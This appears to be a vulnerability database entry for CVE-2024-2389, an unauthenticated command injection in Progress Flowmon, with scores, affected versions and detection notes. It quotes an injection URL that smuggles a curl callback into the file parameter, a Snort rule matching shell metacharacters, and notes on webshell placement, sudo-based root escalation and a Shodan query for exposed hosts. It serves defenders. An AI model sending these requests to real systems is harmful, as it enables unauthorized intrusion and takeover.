cbcvebase.
CVE-2024-2389
published 2024-04-02

CVE-2024-2389: In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
93.90%
99.8th percentile
In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.

Affected

4 ranges
VendorProductVersion rangeFixed in
progressflowmon< 11.1.1411.1.14
progressflowmon>= 12.0.0 < 12.3.512.3.5
progress_softwareflowmon>= 11.X < 11.1.1411.1.14
progress_softwareflowmon>= 12.X < 12.3.512.3.5

Detection & IOCsextracted from sources · hover to see the quote

url/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`
path/service.pdfs/confluence
path/var/www/shtml/
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Progress Flowmon OS Command Injection in Service:Pdfs:Confluence Module (CVE-2024-2389)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/service.pdfs/confluence"; fast_pattern; content:"file|3d|"; pcre:"/^[^&]*?(?:\x3b|\x0a|\x60|\x7c|\x24)/R"; reference:url,rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/; reference:cve,2024-2389; classtype:web-application-attack; sid:2056384; rev:1; metadata:affected_product Progress_Flowmon, attack_target Server, tls_state TLSDecrypt, created_at 2024_10_02, cve CVE_2024_2389, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2024_10_02, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets the `pluginPath` or `file` parameters in the Flowmon management interface API endpoint `/service.pdfs/confluence` using command substitution syntax such as $(...) or backticks to achieve blind OS command injection.
  • Command execution is blind (no output returned); attackers are observed writing webshells to `/var/www/shtml/` as a post-exploitation step. Monitor that directory for new or modified PHP/web files.
  • The Snort/ET rule detects the attack by matching GET requests to `/service.pdfs/confluence` with a `file=` parameter containing shell metacharacters: semicolon (0x3b), newline (0x0a), backtick (0x60), pipe (0x7c), or dollar sign (0x24).
  • The Metasploit module for privilege escalation abuses sudo rules on Flowmon that allow certain binaries to auto-elevate based on filename, including executing PHP with a specific filename. Monitor for unexpected PHP execution via sudo.
  • Use Shodan query `Server: Flowmon` to identify internet-exposed Flowmon instances for asset discovery and attack surface monitoring.
  • The Nuclei template confirms exploitation via an out-of-band HTTP callback (interactsh). Detect exploitation attempts by monitoring for outbound HTTP/DNS requests originating from the Flowmon server process shortly after requests to `/service.pdfs/confluence`.
  • ·The Metasploit RCE module targets Flowmon versions before v12.03.02, while the NVD advisory and vendor bulletin cite the patched versions as 11.1.14 and 12.3.5. Ensure detection coverage spans all v11.x and v12.x instances below those thresholds.
  • ·The ET Snort rule (sid:2056384) requires TLS decryption (`tls_state TLSDecrypt`) to be effective when Flowmon is accessed over HTTPS. Without SSL/TLS inspection, the rule will not fire on encrypted traffic.
  • ·The privilege escalation to root is a separate, chained local exploit (sudo abuse) applicable to Flowmon up to at least version 12.3.5, meaning even patched RCE instances may still be vulnerable to local privilege escalation post-initial-access.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.